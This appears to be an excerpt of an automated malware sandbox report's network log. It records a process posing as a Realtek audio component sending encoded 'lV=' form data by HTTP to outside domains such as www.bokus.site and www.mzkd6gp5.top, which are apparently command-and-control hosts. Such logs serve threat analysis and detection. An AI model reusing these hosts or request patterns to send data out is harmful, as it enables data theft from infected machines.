                                                                          Data Raw: 6c 56 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2f 75 51 6b 39 6b 43 31 45 6f 63 72 54 68 36 39 77 57 77 32 4c 31 56 4a 4a 34 6b 55 6a 6a 63 55 79 54 71 4c 6f 6f 32 37 6d 6c 44 46 4f 4f 32 47 31 37 51 44 74 66 63 63 55 4b 6b 2b 2f 69 65 41 63 66 48 53 68 73 4c 77 38 52 4c 58 6c 30 76 55 78 6c 33 63 62 79 31 50 53 6b 71 44 72 4b 6b 71 62 43 58 62 6c 61 4a 2f 32 55 32 6a 46 61 43 63 76 33 71 6e 54 43 75 61 58 69 69 68 71 71 51 4f 4a 73 6f 4e 6d 56 35 53 58 45 51 6a 73 61 76 76 44 66 79 32 44 68 4c 4a 59 4a 6c 2f 44 39 61 63 6e 44 62 6d 78 53 44 65 69 72 6e 59 4c 71 33 57 79 68 6a 4a 45 6d 75 34 49 38 32 30 35 67 45 46 31 41 59 33 41 67 35 [TRUNCATED]
                                                                          Data Ascii: lV=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R/uQk9kC1EocrTh69wWw2L1VJJ4kUjjcUyTqLoo27mlDFOO2G17QDtfccUKk+/ieAcfHShsLw8RLXl0vUxl3cby1PSkqDrKkqbCXblaJ/2U2jFaCcv3qnTCuaXiihqqQOJsoNmV5SXEQjsavvDfy2DhLJYJl/D9acnDbmxSDeirnYLq3WyhjJEmu4I8205gEF1AY3Ag5Kkz75E/mEKZjz01eEkFXxojxw0FeKHzJ1V4+ZUcUd4WhaWChZgq4FajJd685UHl+YEXVCbdHd8x6vEraU/inpWqlaWdOxrCRSMHtdn2vcTQAHUqyHTkE1BzBSQbzYwtPJPvLbTJAoMBVFaDvQy/WAgeRlnkW/mkYJmkQmgDzh9i5CFlGT32cTcqgKss25fo4zszhZyoBzKd0fAJEbCRwdyRo+7JlvahzmFHhQB4kG0FlskL9tAQhWfs+5h1UUHP36bT+WbKLjUF3yIFHGBUjCcNh51MBshWtjFQC/gem2ps/AJ7SnwRfryQHVQXmmfILcXp4qYgYNGZY41XVmH+u5plDlO2kZ5APyQc6tntNl2UD1nfOXD59f+bCqKp9Jy950Qhb1Cd05qv0i4Mcpy3XRjkKaCU7+63eEmJjMYWpx2FTIzBZh8YC3Oi2nPPRkeaTWuTr+VM64cmHCt/uzJ34ZuR18nq9HHt3IuWxTA06MuqlP5QTwFPkTEDfsvzViuN4i1rjdpTm3ec1axfUBklphCF3A3XXz09uL2V+9/gxKJXZaVD2MX3HTo7/wJBxnddqzgEsi00VADtBAX+/17I8RjlFYtBBTfVyeVwlP5qxrsay3lk+9J0mINgw8RWgNYY+Dj4qgSrJ585lRJ1YpbM4rhhohgkXpyDAQK [TRUNCATED]
                                                                          Jan 9, 2025 16:48:03.753026009 CET912INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:03 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zELVCdTgKqAqAvxAEYSCyv85anV331n63HVrbhVhkxEHdyqn6GB7W2T4qdp%2B%2B2C1mSmGBfD7SjEhQ3dVNHOMr7Op3CJVMDgnT3Mmj1ta1A%2BeVxfSwNsq5LcGeWywdxWMNd7X"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff591c08a05a482-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=120105&min_rtt=120105&rtt_var=60052&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                          Jan 9, 2025 16:48:03.753072023 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.11.2049753104.21.96.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:05.875560045 CET530OUTGET /3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.mzkd6gp5.top
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:06.418689966 CET932INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:06 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2FjrVcVQEWt6V7%2B9%2BJAhwqZHBpNWakYQZCxhzY3EL4%2B29uL2NKdnjArQ6U6LXWuFA0GSCdb%2FNC0jdG%2FkRdwev5CB%2FKJ3YPWg6Fad2EdiZeOdEsHUqp4Uf6rYFsawNnL5vDyo"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff591d12c780298-ORD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119802&min_rtt=119802&rtt_var=59901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 9, 2025 16:48:06.418703079 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.11.2049754199.192.21.169807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:11.785504103 CET789OUTPOST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 56 67 74 66 39 6c 6a 4d 4e 43 68 36 70 66 76 64 49 63 42 76 41 3d 3d
                                                                          Data Ascii: lV=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
                                                                          Jan 9, 2025 16:48:11.979461908 CET918INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:11 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.11.2049755199.192.21.169807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:14.490849018 CET809OUTPOST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 61 62 77 41 75 6b 31 72 62 64 49 41 7a 2f 5a 35 7a 51 7a 49 3d
                                                                          Data Ascii: lV=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
                                                                          Jan 9, 2025 16:48:14.679184914 CET918INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:14 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.11.2049756199.192.21.169807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:17.193728924 CET7958OUTPOST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 35 69 7a 57 [TRUNCATED]
                                                                          Data Ascii: lV=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+h7Vd4eDFr7183rEtKuW4A3H1npfbtbY2thtel08HdIYRPDf44G7fLp+z2YfbwgF9AvOD+AI7LZ7TGBOiD4aSNNJC9+TTLhj8J4GVN2UtutD8KxHKRN3KxEcHbgei2+3bLPyPH8PWbNKFlY80ZoeBBNbTw4qhsniS7t83sA4EmPJTS1vMcXjjxirvh8EbkrQo9q5izW026YBV+a0eZTa5Gs4rwJ6Fl0UACMH0Dxw/Mo14s26X9Wvlq2w9L7kbvLEfaA9vELxYMKGHFX9VBnF0Y/rasbCSYe7NGYCzWbjOoOZiSIUgmYCXTUMec7Akv0IObf7p00fvMw084JAUjGjYA3+riLnwkO0kcaDekzygDHv6O5JtKIAq2vGtqYLGoyKLfqyu5E2qxqgOdpw10+X8BiG4OSeZZ1oLHMnCss21407VRW2+xGpvaIiWWuA+OIMeph4TiMETcMgXQtB9WxJvpzaotAi86271PilkISdxdBsBEg8cp69KMK9qghrB66gWLyp6+Ou9PEq8FZt1odZbYyjuFMCqGkPiFI0+j6dzyFt1rcJVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapUoDeymYvYaumZogC33wF/tqwFvt9BkQDGtGvwVuqohEQ1V+I9ajsgYjpqG8o/a5qVAWYTlag [TRUNCATED]
                                                                          Jan 9, 2025 16:48:17.382185936 CET918INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:17 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.11.2049757199.192.21.169807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:19.894273996 CET528OUTGET /qps0/?lV=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:20.080899954 CET933INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:48:19 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.11.204975847.83.1.90807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:48:34.821835041 CET792OUTPOST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
